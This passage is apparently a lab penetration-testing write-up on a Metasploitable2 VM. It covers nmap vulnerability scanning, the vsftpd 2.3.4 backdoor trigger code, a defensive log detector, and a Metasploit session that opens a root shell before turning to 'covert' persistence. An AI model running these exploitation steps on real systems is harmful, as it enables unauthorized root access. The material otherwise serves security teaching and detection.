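    hosts: Dict[str, dict] = {}
    current: Optional[dict] = None
    for raw in text.splitlines():
        line = raw.strip()
        m = HOST_RE.match(line)
        if m:
            name, ip_in_parens = m.groups()
            ip = ip_in_parens or name
            current = {"ip": ip, "hostname": name if ip_in_parens else None,
                       "ports": [], "mac": None, "os": None, "service_info": None}
            hosts[ip] = current
            continue
        if current is None:
            continue
        m = PORT_RE.match(line)
        if m:
            port, proto, state, service, version = m.groups()
            current["ports"].append({"port": int(port), "proto": proto, "state": state,
                                     "service": service, "version": version})
        elif line.startswith("MAC Address: "):
            current["mac"] = line.split()[2]
        elif line.startswith("OS details: "):
            current["os"] = line[len("OS details: "):]
        elif line.startswith("Service Info: "):
            current["service_info"] = line[len("Service Info: "):]
    return hosts


def live_ips(text: str) -> List[str]:
    """Robust replacement for:  grep "for" livehosts.txt | cut -d " " -f5"""
    return [h["ip"] for h in parse_nmap_report(text).values()]


def find_metasploitable(hosts: Dict[str, dict]) -> List[str]:
    """Flag hosts whose hostname, Service Info or any service banner mentions
    Metasploitable (port 1524 on the VM literally advertises a root shell)."""
    hits = []
    for ip, h in hosts.items():
        fields = [h["hostname"], h["service_info"]] + [p["version"] for p in h["ports"]]
        blob = " ".join(f for f in fields if f).lower()
        if "metasploitable" in blob:
            hits.append(ip)
    return hits


if __name__ == "__main__":
    parsed = parse_nmap_report(SAMPLE)
    print("live hosts:", live_ips(SAMPLE))
    for ip, h in parsed.items():
        print(f"{ip:16} {h['hostname'] or '-':28} {h['os'] or '-'}")
        for p in h["ports"]:
            print(f"    {p['port']}/{p['proto']:4} {p['service']:12} {p['version']}")
    print("Metasploitable2 candidates:", find_metasploitable(parsed))
```

    Feed it the real osdetails.txt instead of SAMPLE and the per-host table it prints is the skeleton of the findings section of the report; for a production pipeline, Nmap's -oX output with an XML parser is the more stable choice, since the normal output format is meant for humans and may change between releases.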



    Vulnerability Scanning


    In the scanning phase we scan the target machine for known vulnerabilities. Again we use Nmap, this time with the vuln script category, which runs its vulnerability-detection NSE scripts against the open services.




    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ sudo nmap -Pn --script vuln 192.168.43.120 > vuln.txt
    Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
    
    
    

    The output is here - 



    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ cat vuln.txt              
    Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-09 23:31 IST
    Nmap scan report for 192.168.43.120
    Host is up (0.00014s latency).
    Not shown: 977 closed ports
    PORT     STATE SERVICE
    21/tcp   open  ftp
    | ftp-vsftpd-backdoor: 
    |   VULNERABLE:
    |   vsFTPd version 2.3.4 backdoor
    |     State: VULNERABLE (Exploitable)
    |     IDs:  BID:48539  CVE:CVE-2011-2523
    |       vsFTPd version 2.3.4 backdoor, this was reported on 2011-07-04.
    |     Disclosure date: 2011-07-03
    |     Exploit results:
    |       Shell command: id
    |       Results: uid=0(root) gid=0(root)
    |     References:
    |       https://www.securityfocus.com/bid/48539
    |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2523
    |       https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
    |_      http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html
    |_sslv2-drown: 
    22/tcp   open  ssh
    23/tcp   open  telnet
    25/tcp   open  smtp
    | smtp-vuln-cve2010-4344: 
    |_  The SMTP server is not Exim: NOT VULNERABLE
    | ssl-dh-params: 
    |   VULNERABLE:
    |   Anonymous Diffie-Hellman Key Exchange MitM Vulnerability
    |     State: VULNERABLE
    |       Transport Layer Security (TLS) services that use anonymous
    |       Diffie-Hellman key exchange only provide protection against passive
    |       eavesdropping, and are vulnerable to active man-in-the-middle attacks
    |       which could completely compromise the confidentiality and integrity
    |       of any data exchanged over the resulting session.
    |     Check results:
    |       ANONYMOUS DH GROUP 1
    |             Cipher Suite: TLS_DH_anon_EXPORT_WITH_DES40_CBC_SHA
    |             Modulus Type: Safe prime
    |             Modulus Source: Unknown/Custom-generated
    |             Modulus Length: 512
    |             Generator Length: 8
    |             Public Key Length: 512
    |     References:
    |       https://www.ietf.org/rfc/rfc2246.txt
    |   
    |   Transport Layer Security (TLS) Protocol DHE_EXPORT Ciphers Downgrade MitM (Logjam)
    |     State: VULNERABLE
    |     IDs:  BID:74733  CVE:CVE-2015-4000
    |       The Transport Layer Security (TLS) protocol contains a flaw that is
    |       triggered when handling Diffie-Hellman key exchanges defined with
    |       the DHE_EXPORT cipher. This may allow a man-in-the-middle attacker
    |       to downgrade the security of a TLS session to 512-bit export-grade
    |       cryptography, which is significantly weaker, allowing the attacker
    |       to more easily break the encryption and monitor or tamper with
    |       the encrypted stream.
    |     Disclosure date: 2015-5-19
    |     Check results:
    |       EXPORT-GRADE DH GROUP 1
    |             Cipher Suite: TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA
    |             Modulus Type: Safe prime
    |             Modulus Source: Unknown/Custom-generated
    |             Modulus Length: 512
    |             Generator Length: 8
    |             Public Key Length: 512
    |     References:
    |       https://www.securityfocus.com/bid/74733
    |       https://weakdh.org
    |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4000
    |   
    |   Diffie-Hellman Key Exchange Insufficient Group Strength
    |     State: VULNERABLE
    |       Transport Layer Security (TLS) services that use Diffie-Hellman groups
    |       of insufficient strength, especially those using one of a few commonly
    |       shared groups, may be susceptible to passive eavesdropping attacks.
    |     Check results:
    |       WEAK DH GROUP 1
    |             Cipher Suite: TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA
    |             Modulus Type: Safe prime
    |             Modulus Source: postfix builtin
    |             Modulus Length: 1024
    |             Generator Length: 8
    |             Public Key Length: 1024
    |     References:
    |_      https://weakdh.org
    | ssl-poodle: 
    |   VULNERABLE:
    |   SSL POODLE information leak
    |     State: VULNERABLE
    |     IDs:  BID:70574  CVE:CVE-2014-3566
    |           The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
    |           products, uses nondeterministic CBC padding, which makes it easier
    |           for man-in-the-middle attackers to obtain cleartext data via a
    |           padding-oracle attack, aka the "POODLE" issue.
    |     Disclosure date: 2014-10-14
    |     Check results:
    |       TLS_RSA_WITH_AES_128_CBC_SHA
    |     References:
    |       https://www.securityfocus.com/bid/70574
    |       https://www.openssl.org/~bodo/ssl-poodle.pdf
    |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
    |_      https://www.imperialviolet.org/2014/10/14/poodle.html
    |_sslv2-drown: ERROR: Script execution failed (use -d to debug)
    53/tcp   open  domain
    80/tcp   open  http
    | http-csrf: 
    | Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.43.120
    |   Found the following possible CSRF vulnerabilities: 
    |     
    |     Path: http://192.168.43.120:80/dvwa/
    |     Form id: 
    |     Form action: login.php
    |     
    |     Path: http://192.168.43.120:80/twiki/TWikiDocumentation.html
    |     Form id: 
    |     Form action: http://TWiki.org/cgi-bin/passwd/TWiki/WebHome
    |     
    |     Path: http://192.168.43.120:80/twiki/TWikiDocumentation.html
    |     Form id: 
    |     Form action: http://TWiki.org/cgi-bin/passwd/Main/WebHome
    |     
    |     Path: http://192.168.43.120:80/twiki/TWikiDocumentation.html
    |     Form id: 
    |     Form action: http://TWiki.org/cgi-bin/edit/TWiki/
    |     
    |     Path: http://192.168.43.120:80/twiki/TWikiDocumentation.html
    |     Form id: 
    |     Form action: http://TWiki.org/cgi-bin/view/TWiki/TWikiSkins
    |     
    |     Path: http://192.168.43.120:80/twiki/TWikiDocumentation.html
    |     Form id: 
    |     Form action: http://TWiki.org/cgi-bin/manage/TWiki/ManagingWebs
    |     
    |     Path: http://192.168.43.120:80/mutillidae/index.php?page=register.php
    |     Form id: id-bad-cred-tr
    |     Form action: index.php?page=register.php
    |     
    |     Path: http://192.168.43.120:80/mutillidae/index.php?page=dns-lookup.php
    |     Form id: iddnslookupform
    |     Form action: index.php?page=dns-lookup.php
    |     
    |     Path: http://192.168.43.120:80/mutillidae/index.php?page=user-poll.php
    |     Form id: idpollform
    |_    Form action: index.php
    |_http-dombased-xss: Couldn't find any DOM based XSS.
    | http-enum: 
    |   /tikiwiki/: Tikiwiki
    |   /test/: Test page
    |   /phpinfo.php: Possible information file
    |   /phpMyAdmin/: phpMyAdmin
    |   /doc/: Potentially interesting directory w/ listing on 'apache/2.2.8 (ubuntu) dav/2'
    |   /html/: Potentially interesting directory w/ listing on 'apache/2.2.8 (ubuntu) dav/2'
    |   /icons/: Potentially interesting folder w/ directory listing
    |_  /index/: Potentially interesting folder
    | http-fileupload-exploiter: 
    |   
    |_    Couldn't find a file-type field.
    | http-slowloris-check: 
    |   VULNERABLE:
    |   Slowloris DOS attack
    |     State: LIKELY VULNERABLE
    |     IDs:  CVE:CVE-2007-6750
    |       Slowloris tries to keep many connections to the target web server open and hold
    |       them open as long as possible.  It accomplishes this by opening connections to
    |       the target web server and sending a partial request. By doing so, it starves
    |       the http server's resources causing Denial Of Service.
    |       
    |     Disclosure date: 2009-09-17
    |     References:
    |       http://ha.ckers.org/slowloris/
    |_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
    | http-sql-injection: 
    |   Possible sqli for queries:
    |   Possible sqli for forms:
    |     Form at path: /mutillidae/index.php, form's action: index.php. Fields that might be vulnerable:
    |       choice
    |       choice
    |       choice
    |       choice
    |       choice
    |       choice
    |       choice
    |       choice
    |       choice
    |       choice
    |       choice
    |       choice
    |_      initials
    |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
    |_http-trace: TRACE is enabled
    |_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
    111/tcp  open  rpcbind
    139/tcp  open  netbios-ssn
    445/tcp  open  microsoft-ds
    512/tcp  open  exec
    513/tcp  open  login
    514/tcp  open  shell
    1099/tcp open  rmiregistry
    | rmi-vuln-classloader: 
    |   VULNERABLE:
    |   RMI registry default configuration remote code execution vulnerability
    |     State: VULNERABLE
    |       Default configuration of RMI registry allows loading classes from remote URLs which can lead to remote code execution.
    |       
    |     References:
    |_      https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/misc/java_rmi_server.rb
    1524/tcp open  ingreslock
    2049/tcp open  nfs
    2121/tcp open  ccproxy-ftp
    3306/tcp open  mysql
    |_ssl-ccs-injection: No reply from server (TIMEOUT)
    |_sslv2-drown: 
    5432/tcp open  postgresql
    | ssl-ccs-injection: 
    |   VULNERABLE:
    |   SSL/TLS MITM vulnerability (CCS Injection)
    |     State: VULNERABLE
    |     Risk factor: High
    |       OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h
    |       does not properly restrict processing of ChangeCipherSpec messages,
    |       which allows man-in-the-middle attackers to trigger use of a zero
    |       length master key in certain OpenSSL-to-OpenSSL communications, and
    |       consequently hijack sessions or obtain sensitive information, via
    |       a crafted TLS handshake, aka the "CCS Injection" vulnerability.
    |           
    |     References:
    |       http://www.openssl.org/news/secadv_20140605.txt
    |       http://www.cvedetails.com/cve/2014-0224
    |_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
    | ssl-dh-params: 
    |   VULNERABLE:
    |   Diffie-Hellman Key Exchange Insufficient Group Strength
    |     State: VULNERABLE
    |       Transport Layer Security (TLS) services that use Diffie-Hellman groups
    |       of insufficient strength, especially those using one of a few commonly
    |       shared groups, may be susceptible to passive eavesdropping attacks.
    |     Check results:
    |       WEAK DH GROUP 1
    |             Cipher Suite: TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA
    |             Modulus Type: Safe prime
    |             Modulus Source: Unknown/Custom-generated
    |             Modulus Length: 1024
    |             Generator Length: 8
    |             Public Key Length: 1024
    |     References:
    |_      https://weakdh.org
    | ssl-poodle: 
    |   VULNERABLE:
    |   SSL POODLE information leak
    |     State: VULNERABLE
    |     IDs:  BID:70574  CVE:CVE-2014-3566
    |           The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
    |           products, uses nondeterministic CBC padding, which makes it easier
    |           for man-in-the-middle attackers to obtain cleartext data via a
    |           padding-oracle attack, aka the "POODLE" issue.
    |     Disclosure date: 2014-10-14
    |     Check results:
    |       TLS_RSA_WITH_AES_128_CBC_SHA
    |     References:
    |       https://www.securityfocus.com/bid/70574
    |       https://www.openssl.org/~bodo/ssl-poodle.pdf
    |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
    |_      https://www.imperialviolet.org/2014/10/14/poodle.html
    |_sslv2-drown: 
    5900/tcp open  vnc
    |_sslv2-drown: 
    6000/tcp open  X11
    6667/tcp open  irc
    |_irc-unrealircd-backdoor: Looks like trojaned version of unrealircd. See http://seclists.org/fulldisclosure/2010/Jun/277
    8009/tcp open  ajp13
    8180/tcp open  unknown
    | http-cookie-flags: 
    |   /admin/: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/index.html: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/login.html: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/admin.html: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/account.html: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/admin_login.html: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/home.html: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/admin-login.html: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/adminLogin.html: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/controlpanel.html: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/cp.html: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/index.jsp: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/login.jsp: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/admin.jsp: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/home.jsp: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/controlpanel.jsp: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/admin-login.jsp: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/cp.jsp: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/account.jsp: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/admin_login.jsp: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/adminLogin.jsp: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/includes/FCKeditor/editor/filemanager/upload/test.html: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/jscript/upload.html: 
    |     JSESSIONID: 
    |_      httponly flag not set
    | http-enum: 
    |   /admin/: Possible admin folder
    |   /admin/index.html: Possible admin folder
    |   /admin/login.html: Possible admin folder
    |   /admin/admin.html: Possible admin folder
    |   /admin/account.html: Possible admin folder
    |   /admin/admin_login.html: Possible admin folder
    |   /admin/home.html: Possible admin folder
    |   /admin/admin-login.html: Possible admin folder
    |   /admin/adminLogin.html: Possible admin folder
    |   /admin/controlpanel.html: Possible admin folder
    |   /admin/cp.html: Possible admin folder
    |   /admin/index.jsp: Possible admin folder
    |   /admin/login.jsp: Possible admin folder
    |   /admin/admin.jsp: Possible admin folder
    |   /admin/home.jsp: Possible admin folder
    |   /admin/controlpanel.jsp: Possible admin folder
    |   /admin/admin-login.jsp: Possible admin folder
    |   /admin/cp.jsp: Possible admin folder
    |   /admin/account.jsp: Possible admin folder
    |   /admin/admin_login.jsp: Possible admin folder
    |   /admin/adminLogin.jsp: Possible admin folder
    |   /manager/html/upload: Apache Tomcat (401 Unauthorized)
    |   /manager/html: Apache Tomcat (401 Unauthorized)
    |   /admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html: OpenCart/FCKeditor File upload
    |   /admin/includes/FCKeditor/editor/filemanager/upload/test.html: ASP Simple Blog / FCKeditor File Upload
    |   /admin/jscript/upload.html: Lizard Cart/Remote File upload
    |_  /webdav/: Potentially interesting folder
    | http-slowloris-check: 
    |   VULNERABLE:
    |   Slowloris DOS attack
    |     State: LIKELY VULNERABLE
    |     IDs:  CVE:CVE-2007-6750
    |       Slowloris tries to keep many connections to the target web server open and hold
    |       them open as long as possible.  It accomplishes this by opening connections to
    |       the target web server and sending a partial request. By doing so, it starves
    |       the http server's resources causing Denial Of Service.
    |       
    |     Disclosure date: 2009-09-17
    |     References:
    |       http://ha.ckers.org/slowloris/
    |_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
    MAC Address: 08:00:27:67:67:30 (Oracle VirtualBox virtual NIC)
    
    Host script results:
    |_smb-vuln-ms10-054: false
    |_smb-vuln-ms10-061: false
    |_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug)
    
    Nmap done: 1 IP address (1 host up) scanned in 330.59 seconds
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ 
    
    

    The above output shows the list of vulnerabilities found by the scan.

    We will now perform vulnerability analysis of the FTP service (vsftpd), starting from the scan result below:



    PORT     STATE SERVICE
    21/tcp   open  ftp
    | ftp-vsftpd-backdoor: 
    |   VULNERABLE:
    |   vsFTPd version 2.3.4 backdoor
    |     State: VULNERABLE (Exploitable)
    |_sslv2-drown: 
    
    
    



    The Attack Procedure


    The vulnerability was allegedly added to the vsftpd archive between the dates mentioned in the description of the Metasploit module (shown further below).

    The concept of the attack on VSFTPD 2.3.4 is to trigger the malicious code path, which results in a backdoor being opened on port 6200 of the system.



    Let's Exploit


    The following excerpt of the vulnerable source code will make things much clearer:



    -    else if((p_str->p_buf[i]==0x3a)
    -    && (p_str->p_buf[i+1]==0x29))
    -    {
    -      vsf_sysutil_extra();
    -    }
       }
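    Review bot: the removed branch reads p_str->p_buf[i+1] with no check that i+1 is still inside the buffer, so apart from being the backdoor trigger it was also an out-of-bounds read on any string whose last byte is 0x3a; deleting the branch is the right fix, but the change should be paired with removal of vsf_sysutil_extra() itself (not shown in this hunk), otherwise the listener code that binds port 6200 and executes /bin/sh stays in the build.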
    



     

    We can clearly see that if two consecutive bytes in the network buffer match the backdoor sequence 0x3a (colon) followed by 0x29 (closing parenthesis), i.e. a smiley ":)", the malicious function is triggered.

    Furthermore, if we explore the details of the malicious function, we can see the following function definition for it:




    Click Here For More Info - https://pastebin.com/AetT9sS5




    sa.sin_port=6200 sets the backdoor port, and every command sent to that service is executed through the execl("/bin/sh","sh",(char *)0); call, i.e. with the privileges of the vsftpd process.
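    From the defender's side, the two facts above (the 0x3a 0x29 trigger in the USER argument, and the listener on TCP 6200) are exactly what a log-based detection should key on. The following Python detector is an added example, not code from the original report, vsftpd or Metasploit; the two log line formats, the sample lines and the client IP 192.168.43.77 are constructed for the example.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List

# The backdoored str_contains_space() fires when two consecutive bytes of the
# USER argument are 0x3a 0x29 (":)"); vsf_sysutil_extra() then listens on
# TCP 6200 and hands every line it receives to /bin/sh.
TRIGGER_BYTES = b"\x3a\x29"
BACKDOOR_PORT = 6200

# Constructed log formats (assumptions for this example, not a real vsftpd format):
#   FTP control-channel command: "<date> <time> FTP <client-ip> <VERB> [<arg>]"
#   Flow record:                 "<date> <time> FLOW <src-ip> -> <dst-ip>:<dst-port>"
FTP_RE = re.compile(
    r"^(?P<ts>\S+ \S+) FTP (?P<client>\S+) (?P<verb>\S+)(?: (?P<arg>.*))?$")
FLOW_RE = re.compile(
    r"^(?P<ts>\S+ \S+) FLOW (?P<src>\S+) -> (?P<dst>[^:\s]+):(?P<dport>\d+)$")


@dataclass(frozen=True)
class Finding:
    ts: str
    source: str
    reason: str


def has_trigger(user_arg: str) -> bool:
    """True if the USER argument carries the 0x3a 0x29 pair anywhere.

    The backdoor loop scans every byte position, so 'abc:)' and ':)abc' both
    fire; a lone ':' or a lone ')' does not.
    """
    return TRIGGER_BYTES in user_arg.encode("latin-1", "replace")


def scan(lines: Iterable[str]) -> List[Finding]:
    """Flag trigger-bearing USER commands and flows to the backdoor port.

    A flow to 6200 from a source that previously sent the trigger is reported
    as CONFIRMED; a flow to 6200 without a preceding trigger is reported as
    SUSPECT (a probe, or a trigger that the FTP log missed).
    """
    findings: List[Finding] = []
    triggered_by = set()
    for raw in lines:
        line = raw.rstrip("\n")
        m = FTP_RE.match(line)
        if m:
            if m.group("verb").upper() == "USER" and has_trigger(m.group("arg") or ""):
                triggered_by.add(m.group("client"))
                findings.append(Finding(
                    m.group("ts"), m.group("client"),
                    "USER argument contains backdoor trigger bytes 0x3a 0x29"))
            continue
        m = FLOW_RE.match(line)
        if m and int(m.group("dport")) == BACKDOOR_PORT:
            src = m.group("src")
            severity = "CONFIRMED" if src in triggered_by else "SUSPECT"
            findings.append(Finding(
                m.group("ts"), src,
                f"{severity}: connection to backdoor port {BACKDOOR_PORT}"))
    return findings


# Constructed sample log: one benign login, one backdoor trigger followed by
# the 6200 connection it spawns, and one unexplained probe of port 6200.
SAMPLE_LOG = [
    "2021-07-10 00:21:50 FTP 192.168.43.10 USER anonymous",
    "2021-07-10 00:21:51 FTP 192.168.43.10 PASS guest@example",
    "2021-07-10 00:21:53 FTP 192.168.43.152 USER hUfYKz:)",
    "2021-07-10 00:21:53 FTP 192.168.43.152 PASS 6cV0Ar",
    "2021-07-10 00:21:53 FLOW 192.168.43.152 -> 192.168.43.120:6200",
    "2021-07-10 00:22:01 FLOW 192.168.43.77 -> 192.168.43.120:6200",
    "2021-07-10 00:22:05 FLOW 192.168.43.77 -> 192.168.43.120:21",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f.ts}  {f.source:<16} {f.reason}")
```

    Running it on the sample log yields three findings: the trigger from 192.168.43.152, the CONFIRMED 6200 connection from the same source, and a SUSPECT 6200 connection from 192.168.43.77.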



    Vulnerability analysis of VSFTPD 2.3.4 backdoor


    After modeling threats, let us load the matching module into Metasploit using the use exploit/unix/ftp/vsftpd_234_backdoor command and analyze the vulnerability details using the info command, as follows:



    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ sudo msfconsole -q                                                                                                       
    This copy of metasploit-framework is more than two weeks old.
     Consider running 'msfupdate' to update to the latest version.
    msf6 > search vsftpd
    
    Matching Modules
    ================
    
       #  Name                                  Disclosure Date  Rank       Check  Description
       -  ----                                  ---------------  ----       -----  -----------
       0  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution
    
    
    Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor
    
    msf6 > 
    msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
    [*] Using configured payload cmd/unix/interact
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > info 
    
           Name: VSFTPD v2.3.4 Backdoor Command Execution
         Module: exploit/unix/ftp/vsftpd_234_backdoor
       Platform: Unix
           Arch: cmd
     Privileged: Yes
        License: Metasploit Framework License (BSD)
           Rank: Excellent
      Disclosed: 2011-07-03
    
    Provided by:
      hdm 
      MC 
    
    Available targets:
      Id  Name
      --  ----
      0   Automatic
    
    Check supported:
      No
    
    Basic options:
      Name    Current Setting  Required  Description
      ----    ---------------  --------  -----------
      RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
      RPORT   21               yes       The target port (TCP)
    
    Payload information:
      Space: 2000
      Avoid: 0 characters
    
    Description:
      This module exploits a malicious backdoor that was added to the 
      VSFTPD download archive. This backdoor was introduced into the 
      vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011 
      according to the most recent information available. This backdoor 
      was removed on July 3rd 2011.
    
    References:
      OSVDB (73573)
      http://pastebin.com/AetT9sS5
      http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html
    
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) >
    




    Now we are going to set RHOST and RPORT, list and select the payload, check these options, and finally run the exploit.




    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options
    
    Module options (exploit/unix/ftp/vsftpd_234_backdoor):
    
       Name    Current Setting  Required  Description
       ----    ---------------  --------  -----------
       RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
       RPORT   21               yes       The target port (TCP)
    
    
    Payload options (cmd/unix/interact):
    
       Name  Current Setting  Required  Description
       ----  ---------------  --------  -----------
    
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Automatic
    
    
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOST 192.168.43.120
    RHOST => 192.168.43.120
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RPORT 21
    RPORT => 21
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show payloads
    
    Compatible Payloads
    ===================
    
       #  Name                       Disclosure Date  Rank    Check  Description
       -  ----                       ---------------  ----    -----  -----------
       0  payload/cmd/unix/interact                   normal  No     Unix Command, Interact with Established Connection
    
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set payload payload/cmd/unix/interact
    payload => cmd/unix/interact
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) >
    



    As you can see, after exploitation we can do many things, but there is one problem: how to maintain access. Once we exit the session it is destroyed, and we have to run the exploit again to regain access or run commands.



    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > 
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
    
    [*] 192.168.43.120:21 - Banner: 220 (vsFTPd 2.3.4)
    [*] 192.168.43.120:21 - USER: 331 Please specify the password.
    [+] 192.168.43.120:21 - Backdoor service has been spawned, handling...
    [+] 192.168.43.120:21 - UID: uid=0(root) gid=0(root)
    [*] Found shell.
    [*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.43.120:6200) at 2021-07-10 00:21:53 +0530
    
    whoami
    root
    pwd
    /
    
    ls
    bin
    boot
    cdrom
    dev
    etc
    home
    initrd
    initrd.img
    lib
    lost+found
    media
    mnt
    nohup.out
    opt
    proc
    root
    sbin
    srv
    sys
    tmp
    usr
    var
    vmlinuz
    
    ls -la
    total 125
    drwxr-xr-x  21 root root  4096 May 20  2012 .
    drwxr-xr-x  21 root root  4096 May 20  2012 ..
    drwxr-xr-x   2 root root  4096 May 13  2012 bin
    drwxr-xr-x   4 root root  1024 May 13  2012 boot
    lrwxrwxrwx   1 root root    11 Apr 28  2010 cdrom -> media/cdrom
    drwxr-xr-x  14 root root 13500 Jul  9 13:48 dev
    drwxr-xr-x  94 root root  4096 Jul  9 14:41 etc
    drwxr-xr-x   7 root root  4096 Jun  2 05:32 home
    drwxr-xr-x   2 root root  4096 Mar 16  2010 initrd
    lrwxrwxrwx   1 root root    32 Apr 28  2010 initrd.img -> boot/initrd.img-2.6.24-16-server
    drwxr-xr-x  13 root root  4096 May 13  2012 lib
    drwx------   2 root root 16384 Mar 16  2010 lost+found
    drwxr-xr-x   4 root root  4096 Mar 16  2010 media
    drwxr-xr-x   3 root root  4096 Apr 28  2010 mnt
    -rw-------   1 root root 41871 Jul  9 13:49 nohup.out
    drwxr-xr-x   2 root root  4096 Mar 16  2010 opt
    dr-xr-xr-x 118 root root     0 Jul  9 13:48 proc
    drwxr-xr-x  13 root root  4096 Jul  9 13:49 root
    drwxr-xr-x   2 root root  4096 May 13  2012 sbin
    drwxr-xr-x   2 root root  4096 Mar 16  2010 srv
    drwxr-xr-x  12 root root     0 Jul  9 13:48 sys
    drwxrwxrwt   4 root root  4096 Jul  9 14:07 tmp
    drwxr-xr-x  12 root root  4096 Apr 28  2010 usr
    drwxr-xr-x  14 root root  4096 Mar 17  2010 var
    lrwxrwxrwx   1 root root    29 Apr 28  2010 vmlinuz -> boot/vmlinuz-2.6.24-16-server
    
    



    Post Exploitation

    Having understood this vulnerability and gained access once, let us exploit it once more, this time with the goal of maintaining persistent, covert control over the target. First, let us see what options we need to set before firing the exploit at the target; we can do this by running the show options command, as shown below.




    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options
    
    Module options (exploit/unix/ftp/vsftpd_234_backdoor):
    
       Name    Current Setting  Required  Description
       ----    ---------------  --------  -----------
       RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
       RPORT   21               yes       The target port (TCP)
    
    
    Payload options (cmd/unix/interact):
    
       Name  Current Setting  Required  Description
       ----  ---------------  --------  -----------
    
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Automatic
    
    
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOST 192.168.43.120
    RHOST => 192.168.43.120
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RPORT 21
    RPORT => 21
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show payloads
    
    Compatible Payloads
    ===================
    
       #  Name                       Disclosure Date  Rank    Check  Description
       -  ----                       ---------------  ----    -----  -----------
       0  payload/cmd/unix/interact                   normal  No     Unix Command, Interact with Established Connection
    
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set payload payload/cmd/unix/interact
    payload => cmd/unix/interact
    
    




    We can see that we have only two options, RHOST and RPORT. We set RHOST to the IP address of the target and RPORT to 21, the port of the vulnerable FTP server.


